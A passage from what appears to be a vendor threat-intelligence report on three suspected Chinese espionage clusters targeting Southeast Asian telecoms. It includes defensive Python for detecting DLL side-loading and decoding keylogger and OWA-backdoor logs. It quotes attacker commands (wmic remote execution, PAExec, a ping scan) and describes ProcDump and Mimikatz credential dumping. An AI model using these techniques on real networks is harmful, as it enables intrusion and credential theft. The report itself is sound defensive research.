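    ("mscorsvw.exe", "mscorsvc.dll"),
    ("chrome_frame_helper.exe", "chrome_frame_helper.dll"),
    ("patchwrap.exe", "atl110.dll"),
}


@dataclass
class ImageLoad:
    image: str          # the process that loaded the module
    image_loaded: str   # the module's path
    image_signer: str   # subject of the process binary's signature; "" if unsigned
    module_signer: str  # same for the module; "" if unsigned


def split_path(path: str) -> tuple[str, str]:
    """Lower-cased (directory, file name); done by hand so it also works off-Windows."""
    p = path.lower().replace("/", "\\")
    directory, _, name = p.rpartition("\\")
    return directory, name


def assess(ev: ImageLoad) -> list[str]:
    reasons = []
    host_dir, host = split_path(ev.image)
    mod_dir, mod = split_path(ev.image_loaded)

    if (host, mod) in KNOWN_SIDELOAD_PAIRS:
        reasons.append("known_sideload_pair")

    if host_dir == mod_dir and ev.image_signer:
        # A vendor-signed host pulling an unsigned DLL from its own directory: the
        # vendor signed the EXE, the attacker dropped the DLL beside it.
        if not ev.module_signer:
            reasons.append("signed_host_unsigned_module_same_dir")
        # Both signed, by different parties. Microsoft-signed runtimes (VC++
        # redistributables) legitimately ship beside third-party EXEs, so skip those.
        elif ev.module_signer != ev.image_signer and "microsoft" not in ev.module_signer.lower():
            reasons.append("signer_mismatch_same_dir")
    return reasons


SAMPLE_EVENTS = [  # constructed for this example
    ImageLoad(r"C:\Program Files\Google\Chrome Frame\chrome_frame_helper.exe",
              r"C:\Program Files\Google\Chrome Frame\chrome_frame_helper.dll",
              "Google LLC", ""),
    ImageLoad(r"C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\PatchWrap.exe",
              r"C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\atl110.dll",
              "Symantec Corporation", ""),
    ImageLoad(r"C:\Program Files\Vendor\app.exe", r"C:\Program Files\Vendor\msvcp140.dll",
              "Vendor Inc", "Microsoft Corporation"),
    ImageLoad(r"C:\Program Files\Vendor\app.exe", r"C:\Program Files\Vendor\helper.dll",
              "Vendor Inc", "Some Other Signer"),
    ImageLoad(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\ntdll.dll",
              "Microsoft Windows", "Microsoft Windows"),
]


def triage(events=SAMPLE_EVENTS) -> dict[str, list[str]]:
    """module path -> reasons, for events that matched at least one rule."""
    return {ev.image_loaded: r for ev in events if (r := assess(ev))}


if __name__ == "__main__":
    for module, reasons in triage().items():
        print(f"{module}: {', '.join(reasons)}")
```

The pair list catches only what has already been reported; the two signer rules are what catch the next host the actors switch to after a quarantine, which is exactly the adaptation described above. The Microsoft exemption is a known blind spot (a DLL signed with a stolen Microsoft-issued certificate passes), so pair it with hash or import-hash checks on anything the signer rules let through.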
As displayed below in the Cybereason Defense Platform, the abuse of trusted security tools, and especially anti-virus software, is a well known tactic used by many threat actors:

_Nebulae Backdoor execution of various tasks as seen in the Cybereason Defense Platform_

The main features of the Nebulae backdoor include:

- Reconnaissance and information gathering about infected hosts
- File and process manipulation
- Execution of arbitrary commands
- Privilege escalation
- C2 communications using raw sockets
- RC4 data encryption of communication between the C2 and the target

According to analysis of the backdoor's code, even though the Nebulae backdoor was first reported in April 2021, there are indications, based on a [file uploaded to VirusTotal in January 2016](https://www.virustotal.com/gui/file/d35c0cbcb05366f168d5a12a229f91a8f678b93fb2c08d1968bab1681c3ed3e7/details), that the first versions of the Nebulae backdoor were already in use in 2016:

_Historic submission data of an early Nebulae sample_

The backdoor communicates with the C2 using what seems to be a somewhat custom implementation of the RC4 encryption algorithm. Initially it uses a XOR key to decrypt the C2 address:

_Decryption of the C2_

Following this procedure, the malware collects data about the infected machine such as the user and machine names, operating system version etc., then encrypts it and sends it to the C2. It then awaits further instructions and jumps to the corresponding method:

_Jumptable for code execution according to the appropriate value_

### Reconnaissance: Living Off the Land - Using Built-In Windows Tools

In order to collect information about the network and endpoints, the attackers used different built-in Windows tools such as net commands, quser, reg, systeminfo, tasklist, netstat, and ping for internal and external connectivity checks.
In addition, the attackers used system commands in order to perform a Ping scan, using the command “find /i"ttl” to check for successful connections: ----- _Execution of legitimate tools for reconnaissance and lateral movement as seen in the Cybereason Defense Platform_ ### Lateral Movement PAExec [The attackers used a renamed PAExec for lateral movement. PAExec is similar to sysinternal’s](https://www.poweradmin.com/paexec/) [PsExec, and it is a redistributable version of](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) PsExec with some additional options. PAExec was used to connect to remote servers and execute additional tools. Both PAExec and PsExec are very common legitimate tools that are seen over and over in the context of cyberattacks and used by many threat actors: backup.exe \\ cmd.exe ### WMI and Net use The attackers used the command “net use” in order to access shared network resources on remote machines. Additionally, WMI was used to execute tools such as the Nebulae Backdoor remotely.: wmic /node: /user: /password: process call create "C:\Program Files (x86)\Symantec\Symantec Endpoint Protection\PatchWrap.exe" ### Credential theft [The attackers used sysinternals’ ProcDump and](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump) [Mimikatz to dump credentials from the domain controllers.](https://www.varonis.com/blog/what-is-mimikatz/) ### ProcDump ProcDump is a tool by Windows Sysinternals that is able to create dumps of processes in the system. The original purpose of ProcDump is to create dumps for troubleshooting issues, however attackers may use the tool in order to dump critical processes like lsass.exe for the purpose of extracting password hashes from its memory: ----- _PAExec and ProcDump execution as seen in the Cybereason Defense Platform_ ### Mimikatz [The attackers used Mimikatz that masquerades as Internet Explorer. 
The metadata of the Mimikatz executable, along with its icon, were altered to make it look like an Internet Explorer binary in an effort to be stealthy. Another Mimikatz executable similarly masquerades as Google Chrome and was found among the tools of Cluster B:

_PAExec and Mimikatz execution as seen in the Cybereason Defense Platform_

### EnrollLogger Keylogger

One of the tools used by the attackers was a custom-built [keylogger](https://en.wikipedia.org/wiki/Keystroke_logging) dubbed "EnrollLogger" by Cybereason. To hide the malicious activity, the attackers deployed a legitimate South Korean multimedia player called [PotPlayer](https://en.wikipedia.org/wiki/PotPlayer), which has a [known DLL-hijacking vulnerability](https://github.com/fireeye/DueDLLigence), along with a trojanized DLL file called PotPlayer.dll.txt ([VT link](https://www.virustotal.com/gui/file/ea2c87eb957a749560237b19b82f7136330b9781d449dd22809154385ef1c032/detection/f-ea2c87eb957a749560237b19b82f7136330b9781d449dd22809154385ef1c032-1613619579)) that PotPlayer.exe loads on execution, making the activity appear legitimate:

_Keylogger execution as seen in the Cybereason Defense Platform_

At the time of the attack, the malicious DLL had a very low detection rate:

_Detection rate of the keylogger in VirusTotal_

The fake DLL has several empty exports; the export that contains the malicious code is called PreprocessCmdLineExW. The keylogger uses the [GetKeyState()](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-getkeystate) function to monitor the user's keystrokes, saving them to a buffer allocated in memory. In addition, the keylogger also steals data stored on the Windows clipboard.
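As an added example (not the report's code and not the malware's), the following Python decodes EnrollLogger output files using the byte-wise scheme the next paragraph describes: a zero byte is XORed with 0xaf, every other byte with 0xaa. The sample plaintext, its line-per-record layout and the triage threshold are constructed for illustration; the report does not reproduce the file format.

```python
"""Decode the on-disk output of the EnrollLogger keylogger.

Added example, not code from the report or from the malware. It implements the
byte-wise scheme the report describes: a plaintext byte of zero is XORed with
0xAF, any other byte with 0xAA. The record layout of the constructed sample is
an assumption; the report does not reproduce the decrypted file's format.
"""

ZERO_KEY = 0xAF   # applied to 0x00 bytes
KEY = 0xAA        # applied to every other byte


def encode(plain: bytes) -> bytes:
    """Re-implementation of the logger's transform, used here to build test data."""
    return bytes((b ^ ZERO_KEY) if b == 0 else (b ^ KEY) for b in plain)


def decode(enc: bytes) -> bytes:
    # 0x00 ^ 0xAF == 0xAF, so an encoded 0xAF stands for a zero byte.
    # The mapping is not injective: 0x05 ^ 0xAA is also 0xAF, so a plaintext
    # 0x05 (ENQ) decodes as NUL. ENQ does not occur in keystroke or clipboard
    # text, so resolving 0xAF to NUL is the right choice for this artifact.
    return bytes(0 if b == ZERO_KEY else (b ^ KEY) for b in enc)


def decode_records(enc: bytes) -> list[str]:
    """Decode a file and return its non-empty text lines, NUL padding removed."""
    text = decode(enc).replace(b"\x00", b"").decode("utf-8", errors="replace")
    return [line for line in text.splitlines() if line]


def looks_encoded(data: bytes, sample: int = 512) -> bool:
    """Cheap triage check for a recovered file: after decoding, the content
    should be almost entirely printable ASCII, whitespace or NUL. A file that is
    already plain text fails this, because XOR 0xAA pushes letters above 0x7F."""
    dec = decode(data[:sample])
    ok = sum(1 for b in dec if 0x20 <= b < 0x7F or b in (0x00, 0x09, 0x0A, 0x0D))
    return bool(dec) and ok / len(dec) >= 0.95


# Constructed plaintext (not the report's decrypted sample): a window title
# line, typed keystrokes with a stray NUL, and a clipboard capture.
SAMPLE = (b"[2021-02-18 09:12:03] [Window: Outlook - Inbox]\r\n"
          b"password123\x00\r\n"
          b"[clipboard] https://owa.example.net/\r\n")
ENCODED = encode(SAMPLE)

if __name__ == "__main__":
    print("encoded?", looks_encoded(ENCODED), "plain?", looks_encoded(SAMPLE))
    for line in decode_records(ENCODED):
        print(line)
```

Because the two keys differ only in how zero bytes are treated, a responder can also recognise an EnrollLogger file by the absence of 0xAA (which a zero byte would never produce) combined with a high density of 0xAF where the logger padded its buffer with NULs.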
The collected keystrokes and clipboard data, along with other information, are then XOR-encrypted (each byte is XORed with 0xaf if it equals zero, and with 0xaa otherwise) and saved in text files in a directory created by the keylogger under C:\Users\user\AppData\Roaming\Microsoft\Network\cache:

_Data saved by the keylogger_

An example of a decrypted file looks like this:

_Decrypted data file that was collected by the Keylogger_

### Cluster C: OWA Backdoor Activity (Mini-Cluster)

During the investigation, we revealed a third cluster, which is in fact a mini-cluster characterized mainly by the deployment of multiple instances of a custom [OWA (Outlook Web Access)](https://en.wikipedia.org/wiki/Outlook_on_the_web) backdoor. The backdoor was used to harvest the credentials of users logging into Microsoft OWA services, giving the attackers stealthy access to the environment. According to the forensic evidence available to us, the earliest indications of use of this backdoor date back to 2017. The deployment of the backdoor continued all the way to 2021, bearing the hallmark of a true advanced persistent threat (APT).

From 2017 to 2020 we observed only a few instances of the backdoor. However, in March 2021 the attackers installed the backdoor on over 20 machines in a short period of time. This uptick could be explained by the attackers losing access due to mitigation efforts and needing to re-establish it. Another possible explanation is Microsoft's release of patches for the newly discovered Microsoft Exchange Server vulnerabilities, which caused a sharp rise in attacks against unpatched Exchange servers.
Code analysis of this backdoor showed considerable similarities with previously documented backdoors dubbed "Dllshellexc2007" and "Dllshellexc2010", which were discovered by TrendMicro in their [Operation Iron Tiger report](https://paper.seebug.org/papers/APT/APT_CyberCriminal_Campagin/2015/2015.09.17.Operation_Iron_Tiger/wp-operation-iron-tiger.pdf) and attributed to Group-3390 (also tracked by some vendors as APT27 or Emissary Panda). According to the Iron Tiger report, the backdoor is compatible with, and can integrate with, the China Chopper WebShell.

The activity of this backdoor, however, could not be tied directly to the other clusters, which is why we kept it as a separate cluster. That said, there were instances where we observed this backdoor deployed on the same victim as Clusters A and B, around the same time frames, and in some cases even on the same endpoints. Given these overlaps and the previously documented compatibility of this OWA backdoor with the China Chopper WebShell, it is possible that Cluster C is somehow related to the activity described in Cluster A, yet a direct connection between the two was not observed in our investigation.

### Custom OWA Backdoor - Core Functionality

The custom .NET backdoor is named "Microsoft.Exchange.Clients.Event.dll" and can be installed on either Microsoft Exchange or Internet Information Services (IIS) servers. Its main purpose is to harvest the credentials of any user who authenticates to OWA services. In addition, the backdoor contains WebShell-like functionality that allows the attackers to run arbitrary commands, exfiltrate data and deploy additional tools.

The binary itself is obfuscated with .NET Reactor, a code protection and software licensing product used for obfuscation. Such obfuscation software is often used by malware authors in an effort to hinder analysis.
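The credential log this backdoor writes is simple to recover once its encoding is known. The following Python is an added example, not the backdoor's code: it reproduces the "~ex.dat" encoding described in this section (each byte XORed with 183, then base64), decodes a file back into records, and matches the "owa/auth.owa" URI fragment the backdoor hooks. Assumptions, since the report does not spell them out: records are newline-separated and each line of the file is its own base64 blob (a single whole-file blob decodes the same way), and the field order follows the decoded excerpt quoted further down (date, time, AM/PM, remote IP, then the remainder of the line). The sample records and addresses are constructed.

```python
"""Decode and triage the OWA backdoor's ~ex.dat credential log.

Added example, not the backdoor's code. It follows the behaviour the report
describes: requests whose URI contains "owa/auth.owa" are intercepted; date and
time, remote IP, username, password and User-Agent are logged; each byte of the
record is XORed with 183 and the result is base64-encoded into %temp%\\~ex.dat.
Record separator, per-line base64 and field order are assumptions (see above).
"""
import base64

XOR_KEY = 183                      # 0xB7, per the report
HOOKED_URI_FRAGMENT = "owa/auth.owa"


def xor_key(data: bytes) -> bytes:
    return bytes(b ^ XOR_KEY for b in data)


def is_hooked(uri: str) -> bool:
    """True if the backdoor would parse this request for credentials."""
    return HOOKED_URI_FRAGMENT in uri


def encode_log(records: list[str]) -> str:
    """Produce ~ex.dat content as the backdoor would (one base64 line per record).
    Used here only to build test data."""
    return "\r\n".join(base64.b64encode(xor_key(r.encode())).decode() for r in records)


def decode_log(content: str) -> list[str]:
    """Decode a recovered ~ex.dat into plaintext records. Works whether the file
    holds one base64 blob per record or one blob for the whole file."""
    out = []
    for line in content.splitlines():
        if not line.strip():
            continue
        raw = xor_key(base64.b64decode(line.strip()))
        out.extend(r for r in raw.decode("utf-8", errors="replace").splitlines() if r)
    return out


def parse_record(record: str) -> dict:
    """Split one decoded line: '<m/d/yyyy> <h:mm:ss> <AM|PM> <ip> <rest>'.
    The report's excerpt does not show where the username and password sit,
    so everything after the IP is returned unparsed in 'tail'."""
    parts = record.split(" ", 4)
    if len(parts) < 5:
        raise ValueError(f"unexpected record layout: {record!r}")
    date, time, ampm, ip, tail = parts
    return {"timestamp": f"{date} {time} {ampm}", "remote_ip": ip, "tail": tail}


# Constructed records (RFC 5737 documentation addresses, shortened UA strings)
RECORDS = [
    "1/1/2021 5:32:22 PM 203.0.113.7 Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36",
    "1/1/2021 5:40:01 PM 198.51.100.9 Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36",
]
EXDAT = encode_log(RECORDS)

if __name__ == "__main__":
    for rec in decode_log(EXDAT):
        print(parse_record(rec))
    print(is_hooked("/owa/auth.owa"), is_hooked("/owa/"))
```

On a live Exchange or IIS server the same check is worth running the other way round: any file in %temp% whose base64 payload turns into readable date/IP/User-Agent lines after XOR with 183 is this backdoor's log, regardless of what the file is called.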
The backdoor intercepts requests that contain "owa/auth.owa" in the URI (the default login URI for OWA) and steals the login credentials:

_The backdoor checks the URI of the HTTP request_

The backdoor logs the following information from the HTTP requests:

- Connection date and time
- Remote IP address
- Username and password used to log in
- User agent

To protect the stolen data, the backdoor XORs each byte of the collected information with the value 183 (0xb7), base64-encodes the result and saves it to a file named "~ex.dat" in the %temp% directory. If the attacker connects to the server with a specifically crafted session ID, the attacker's HTTP request is parsed in order to execute various commands, such as:

- Downloading additional files
- Uploading files (for data exfiltration)
- Deleting files
- Executing arbitrary commands via a CMD shell

### Similarities with Iron Tiger OWA Backdoors

The "Microsoft.Exchange.Clients.Event.dll" backdoor discussed in this section exhibits both code and functional similarities to a module named "Microsoft.Exchange.Clients.Auth.dll" that is described in [a presentation by Steven Adair](https://published-prd.lanyonevents.com/published/rsaus17/sessionsFiles/5009/HTA-F02-Detecting-and-Responding-to-Advanced-Threats-within-Exchange-Environments.pdf) and in the TrendMicro paper on operation "Iron Tiger", both of which describe sophisticated custom .NET backdoors dubbed "Dllshellexc2007" and "Dllshellexc2010":

_Example of similar code shared between the two modules_

In addition, the credentials log file created by both modules is very similar in its structure and in the data collected:

**Iron Tiger Backdoor - decoded log file of "Microsoft.Exchange.Clients.Auth.dll" ("Dllshellexc2007" and "Dllshellexc2010" backdoors):**

239073 3/2/2015 10:22:09 AM x.x.x.x Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36

**Cluster C OWA Backdoor - decoded log file of "Microsoft.Exchange.Clients.Event.dll":**

1/1/2021 5:32:22 PM x.x.x.x Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36 Edg/87.0.664.66

### Further Connections to Chinese Threat Actors

During our analysis of the different clusters, we noticed interesting connections and similarities to known Chinese threat actors. In the interest of providing a broader context, we decided to share our observations in the hope that they will enable other researchers to draw their own conclusions as to the relevance of our findings.

### Connections to Winnti's Tools and Infrastructure

Connections Between Naikon APT Nebulae Backdoor and Winnti's ShadowPad Infrastructure

When examining a Nebulae backdoor sample (likely not related to this attack), we noticed that one of the domains contacted by the backdoor is ttareyice.jkub[.]com. This domain was previously mentioned in a [detailed report on the activity of the Winnti group](https://www.ptsecurity.com/upload/corporate/ww-en/pt-esc/winnti-2020-eng.pdf) and its relations to other threat groups. It is also worth mentioning that Winnti is known to attack telecommunications companies. Read together with that report, this is additional evidence of Winnti sharing its infrastructure, this time between a ShadowPad sample attributed to Winnti and the Nebulae backdoor, reportedly attributed to Naikon:

_Nebulae and ShadowPad mutual infrastructure_

### Use of PcShare Backdoor in Previous Winnti-Related Attacks

Another possible connection to Winnti's ShadowPad backdoor is the use of a customized PcShare backdoor that was found on multiple endpoints in Cluster A of this report. In October 2020, Dr. Web [released a report](https://st.drweb.com/static/new-www/news/2020/october/Study_of_the_ShadowPad_APT_backdoor_and_its_relation_to_PlugX_en.pdf) detailing targeted attacks in Kazakhstan and Kyrgyzstan involving Winnti's ShadowPad backdoor.
That same report also mentions a backdoor dubbed "BackDoor.Farfli.125" that was deployed alongside the ShadowPad payloads. Our analysis of "BackDoor.Farfli.125" concluded that it is a variant of the open-source PcShare backdoor. From a tradecraft perspective, it is interesting that the attackers in the Dr. Web report also chose a loader that masquerades as a legitimate NVIDIA product, as shown in Cluster A of our report.

### Possible Connection Between APT41 and Soft Cell

While pivoting from indicative PDB paths of the tools used by Soft Cell (listed in Appendix A; some were also observed by [Markus Neis](https://github.com/yt0ng/cracking_softcell/blob/main/Cracking_SOFTCLL_TLP_WHITE.pdf)), we came across additional binaries that share code similarities with another malware named [ChipShot](https://www.slideshare.net/MitchellClarke14/cyber-threat-2019-ncscsans-london-conference-mandiant-grab-bag-of-attacker-activity), attributed to [APT41](https://attack.mitre.org/groups/G0096/) (tracked by some vendors as Winnti). ChipShot is a .NET binary that drops a modified China Chopper WebShell stored in the resource section of the file. Examples of the pivoted PDB paths:

E:\vs_proj\DeployFilter_NET2.0\DeployFilter\obj\Release\DeployFilter.pdb - ChipShot Dropper

E:\vs_proj\serviceFilter_NET2.0\serviceFilter\obj\Release\serviceFilter.pdb - Modified ChinaChopper webshell

It is noteworthy that APT41 [was also reported targeting telecommunications organizations in the past](https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html), and was suggested to be linked to the previous Soft Cell campaign from 2019.
The group was also [reported abusing an NVIDIA product (nvSmartEx.exe) for DLL side-loading](https://www.fireeye.com/content/dam/collateral/en/rpt-apt41-2019.pdf), the same product that was abused in Cluster A:

_Code snippet from ChipShot Dropper: edits the IIS applicationHost.config file_

_Code snippet from Modified ChinaChopper WebShell_

### Possible Connection Between Tropic Trooper and Soft Cell

As previously mentioned in our report, one of the PcShare payloads analyzed had the same hash as a sample mentioned in a [report by BlackBerry from 2019](https://blogs.blackberry.com/en/2019/09/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware). In both instances, the attackers used the exact same DLL search-order hijacking technique with a fake NVIDIA product. Aside from the forensic evidence, the geographical locations of the attacks and the timeline also point to a strong tie between the BlackBerry report and this one. BlackBerry hypothesized that the threat actor behind the attack was [Tropic Trooper](https://attack.mitre.org/groups/G0081/); however, as mentioned in their report, they could not establish that attribution with high certainty. At this point, we can conclude that both intrusions were carried out by the same threat actor, who had access to the same code and used identical tradecraft. Whether Tropic Trooper and Soft Cell are the same actor remains unclear at the moment, since we could not verify the BlackBerry attribution.

### Possible Connection Between Cluster B and an Older Phishing Attempt

The custom keylogger mentioned in Cluster B of this report was executed by a fake svchost.exe process located in a rather unusual folder: c:\program files (x86)\internet explorer\svchost.exe (SHA-1: 91b0d7fa50d993c7a35ec501ef5f3585f0003a51).
Aside from the unusual location, the file also contained a few typos in its metadata fields ("Coporation", "Widows"):

_Typos found in metadata fields of the fake svchost.exe_

Pivoting on these specific typos, file name and version, we found a [sample in VirusTotal uploaded from Vietnam in October 2016](https://www.virustotal.com/gui/file/936f0288d3753b654b04b4f751999dfeb52235b2a0ff39ce312ef72b679787aa/detection) that is also called "svchost.exe" and contains the same typos and file version. Interestingly, the sample's in-the-wild name is "1 Military Alliance Utilizing ASEAN Plus 3 as Platform An Appraisal for Prospects.exe".

Upon execution, the sample unpacks the following into the %TEMP% folder:

- A decoy PDF file
- An unknown backdoor masquerading as the legitimate Windows binary wmiprvse.exe (SHA-1: 5572fa29e61009a626320275b36eef0d5142e3e2)

_Decoy PDF file_

The decoy PDF contains questions and answers regarding a known [geopolitical territorial dispute in the South China Sea](https://en.wikipedia.org/wiki/Territorial_disputes_in_the_South_China_Sea), and in particular discusses the Chinese territorial dispute with the Philippines. While this could be merely a coincidence, the probability of two samples sharing the exact same typos, file name and version, both related to China, does seem peculiar, especially since the Naikon APT group that we believe is behind Cluster B is known to have [attacked countries bordering the South China Sea, including Vietnam and the Philippines](https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/), so we thought it worth mentioning.

### Attribution

Attributing Clusters A, B and C

After analyzing all of the data we accumulated through our platform, incident response efforts, malware analysis, and threat intelligence, we were able to define three distinct clusters of malicious activity.
Each cluster is characterized by its own set of TTPs and infrastructure and, according to our analysis, appears to have operated independently:

**Cluster A: Attributed to the Soft Cell Activity Group**

Based on the evidence provided in this report as well as internal and publicly available information, Cybereason assesses with a high level of confidence that the intrusions detailed in this cluster are consistent with previous activities carried out by the Soft Cell activity group. Soft Cell has not yet been attributed to a specific threat actor; however, the group is assessed to operate on behalf of Chinese state interests. As shown in our report, there are some interesting links between the Soft Cell activity group and the APT41/Winnti threat actor; nevertheless, at the time of writing, there is not enough evidence to tie the two together with sufficient certainty.

**Cluster B: Suspected to be the Naikon APT Group**

Based on the information provided in this report as well as publicly available information on the Naikon APT threat actor's activity, Cybereason assesses with moderate confidence that the intrusions detailed in this cluster were carried out by the Naikon APT group.

**Cluster C: Potentially Related to Group-3390 (also tracked as Emissary Panda, APT27)**

Based on the information provided in this report, Cybereason assesses with low-to-moderate confidence that the intrusions detailed in this cluster were carried out by a threat actor who had access to the code of the "Dllshellexc2007" and "Dllshellexc2010" backdoors detailed in operation "Iron Tiger" and attributed by TrendMicro to Group-3390.

That being said, we cannot ignore certain interesting overlaps when it comes to the aforementioned clusters. In one particular instance, Cybereason observed all three clusters in the same environment, and in some cases even operating on the same endpoints around similar time frames.
Whether this is merely a coincidence, or the clusters are somehow inter-connected, is not entirely clear at this point in time. Among the three clusters, we lean towards the possibility that Clusters A and C might be connected, based on the fact that they have been operating in the same environment for over three years (since 2017/2018), while Cluster B only emerged in Q4 2020. In addition, the OWA backdoor described in Cluster C was [previously shown to interact with the China Chopper WebShell](http://www.erai.com/CustomUploads/ca/wp/2015_12_wp_operation_iron_tiger.pdf), which was used extensively in Cluster A.

Based on our understanding and past experience with Chinese threat actors, there are several hypotheses that might explain those overlaps:

- **One hypothesis** is that the clusters represent the work of two or more teams with different sets of expertise (e.g. an initial access team, a foothold team, a team specialized in telco technology, etc.), all working together and reporting to the same Chinese threat actor.
- **A second hypothesis** is that there are two or more Chinese threat actors with different agendas or tasks that are aware of each other's work and potentially even working in tandem.
- **Another plausible hypothesis** is that the clusters are not interconnected and the threat actors are working independently with no collaboration, or even piggybacking on the access achieved by one of the other actors involved.

One thing that remains consistent and evident in all three clusters is that they all point to threat actors that are believed to be operating on behalf of Chinese state interests. It is also not surprising that the Telcos targeted in these intrusions are located in [ASEAN](https://en.wikipedia.org/wiki/ASEAN) countries, some of which have long-standing, publicly known disputes with the PRC (People's Republic of China).
### A Note on CTI Attribution

In the world of threat intelligence, attribution is often not an exact science and should be continuously re-assessed over time as new information emerges that can shed more light on the identity of the threat actors. Therefore, we encourage our readers to use the information provided in this report and draw their own conclusions. In our attribution, inspired by the well-known [Diamond Model](https://www.activeresponse.org/wp-content/uploads/2013/07/diamond.pdf), we have taken into account the following aspects of the intrusions: victimology (location, industry), capabilities (mainly tools, techniques and procedures) and infrastructure.

When analyzing intrusions that happened over years, it is often difficult to separate one kill chain from another even when there is just a single threat actor. With the possibility of more than one threat actor operating in the same environment, this task becomes even more daunting, and it can be tempting to treat everything as part of one larger attack originating from the same threat actor, which could lead to misattribution. We encourage other analysts to work with a well-defined attribution model that can make the fickle task of attribution less prone to mistakes and biases.

### Conclusion

In this blog we uncovered three clusters of intrusions targeting Telcos in ASEAN countries that were active for several years, with one cluster going back as far as 2017. We assess that the goal behind the intrusions was to facilitate cyber espionage efforts by gaining access to cellular providers for the purpose of exfiltrating sensitive data about the targeted companies and their customers. Each cluster appears to have its own unique characteristics, distinguishing it from the other clusters detailed in this report.
In our report, we also describe the interesting overlaps observed among those clusters, namely the targeting of the same victims, operation around similar time frames, and in some cases the presence of all three clusters on the same endpoints.

According to our analysis, Cluster A was executed by the Soft Cell activity group, a group known to have attacked Telcos in the past in multiple regions and believed to be operating on behalf of Chinese state interests. The intrusions in this cluster span over three years, going back to 2018. The attackers behind it have shown great resourcefulness and adaptiveness in the face of mitigation efforts, finding their way back in repeatedly, which may demonstrate how important it was for them to obtain the data from the targeted Telcos.

Cluster B was discovered in late 2020 and exhibited a different set of tools and techniques, including the rare Nebulae backdoor and the previously undocumented EnrollLogger keylogger. We suspect that the activity in this cluster was carried out by the Naikon APT group, a very active cyber espionage group previously attributed to the Chinese People's Liberation Army (PLA).

Cluster C is the oldest of the clusters, with the first signs of intrusion going back to 2017. This cluster exhibited a rare OWA backdoor that shows considerable code and functionality similarities to previously documented backdoors used by Group-3390 (APT27), an infamous cyber espionage APT group operating on behalf of Chinese state interests.

Whether these clusters are in fact inter-connected or operated independently of each other is not entirely clear at the time of writing. We offered several hypotheses that can account for these overlaps, hoping that as time goes by more information will become available to us and to other researchers to help shed light on this conundrum.
## Researchers

LIOR ROCHBERGER, SENIOR THREAT RESEARCHER

As part of the Nocturnus team at Cybereason, Lior has created procedures to lead threat hunting, reverse engineering and malware analysis teams. Lior has also been a contributing researcher to multiple threat and malware blogs including Bitbucket, Valak, Ramnit, and Raccoon stealer. Prior to Cybereason, Lior led SOC operations within the Israeli Air Force.

TOM FAKTERMAN, THREAT RESEARCHER

Tom Fakterman, Cyber Security Analyst with the Cybereason Nocturnus Research Team, specializes in protecting critical networks and incident response. Tom has experience in researching malware, computer forensics and developing scripts and tools for automated cyber investigations.

DANIEL FRANK, SENIOR MALWARE RESEARCHER

With a decade in malware research, Daniel uses his expertise in malware analysis and reverse engineering to understand APT activity and commodity cybercrime attackers. Daniel has previously shared research at RSA Conference, the Microsoft Digital Crimes Consortium, and Rootcon.

ASSAF DAHAN, HEAD OF THREAT RESEARCH

Assaf has over 15 years in the InfoSec industry. He started his career in the Israeli Military 8200 Cybersecurity unit, where he developed extensive experience in offensive security. Later in his career he led Red Teams, developed penetration testing methodologies, and specialized in malware analysis and reverse engineering.
## Indicators of Compromise

### MITRE ATT&CK BREAKDOWN (Cluster A - Soft Cell Activity)

**Reconnaissance:** Gather Victim Host Information, [Active Scanning](https://attack.mitre.org/techniques/T1595/), [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590/)

**Initial Access:** Exploit Public-Facing Application

**Execution:** Command-Line Interface, [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047/), [PowerShell](https://attack.mitre.org/techniques/T1086/)

**Persistence:** [WebShell](https://attack.mitre.org/techniques/T1100/), Create Account, Scheduled Task

**Privilege Escalation:** Valid Accounts, [WebShell](https://attack.mitre.org/techniques/T1100/)

**Defense Evasion:** [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574/), [Indicator Removal from Tools](https://attack.mitre.org/techniques/T1066/), [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/), [Masquerading](https://attack.mitre.org/techniques/T1036/), Indicator Removal on Host: Timestomp

**Lateral Movement:** [Windows Admin Shares](https://attack.mitre.org/techniques/T1077/), Pass the Hash, Remote File Copy

**Credential Access:** Credential Dumping, Credentials from Password Stores

**Discovery:** System Network Configuration Discovery, [Remote System Discovery](https://attack.mitre.org/techniques/T1018/), Account Discovery, [Permission Groups Discovery](https://attack.mitre.org/techniques/T1069/)

**Exfiltration:** Data Compressed, [Exfiltration Over Command and Control Channel](https://attack.mitre.org/techniques/T1041/)

### MITRE ATT&CK BREAKDOWN (Cluster B - Suspected Naikon APT Activity)

**Reconnaissance:** Gather Victim Host Information, [Active Scanning](https://attack.mitre.org/techniques/T1595/), [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590/)

**Execution:** Command-Line Interface, [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047/), System Services

**Persistence:** Windows Service

**Privilege Escalation:** Valid Accounts

**Defense Evasion:** DLL Side-Loading, [Indicator Removal from Tools](https://attack.mitre.org/techniques/T1066/), [Masquerading](https://attack.mitre.org/techniques/T1036/)

**Lateral Movement:** SMB/Windows Admin Shares, Lateral Tool Transfer

**Credential Access:** Credential Dumping, [Keylogging](https://attack.mitre.org/techniques/T1056/001/)

**Discovery:** System Network Configuration Discovery, [Remote System Discovery](https://attack.mitre.org/techniques/T1018/), Account Discovery, [Permission Groups Discovery](https://attack.mitre.org/techniques/T1069/)

**Command and Control:** Encrypted Channel

### MITRE ATT&CK BREAKDOWN (Cluster C - Custom OWA Backdoor)

**Execution:** Command-Line Interface

**Persistence:** [Web Shell](https://attack.mitre.org/techniques/T1505/003/)

